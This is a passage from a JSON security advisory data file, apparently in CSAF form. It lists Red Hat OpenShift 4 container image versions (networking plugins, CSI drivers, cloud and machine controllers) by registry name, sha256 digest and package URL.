"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3A0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605056"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3A5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564121"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3A58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3A07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564451"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3Ace22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3A2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cloud-controller-manager-rhel9@sha256%3Aac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557397"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cluster-api-controllers-rhel9@sha256%3A211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775562941"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3Ab3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602042"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-operator-rhel9@sha256%3Ae089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557339"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-cloud-controller-manager-rhel9@sha256%3Aa02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775561999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9@sha256%3A6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256%3Ad82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775566494"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-cluster-api-controllers-rhel9@sha256%3Afd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572733"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-machine-controllers-rhel9@sha256%3A8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775566505"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-image-customization-controller-rhel9@sha256%3A4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3Aed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3Ad426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3A5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3Af54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612266"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3A084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3Aa832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3A0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3A04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604912"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3Aaa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3A7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-aws-rhel9@sha256%3A6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557712"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-azure-rhel9@sha256%3A0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557306"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-gcp-rhel9@sha256%3A863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602000"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3A5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564642"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3Af7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3A20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775619097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3A6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3A9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605900"
}
}
},
{
"category": "product_version",
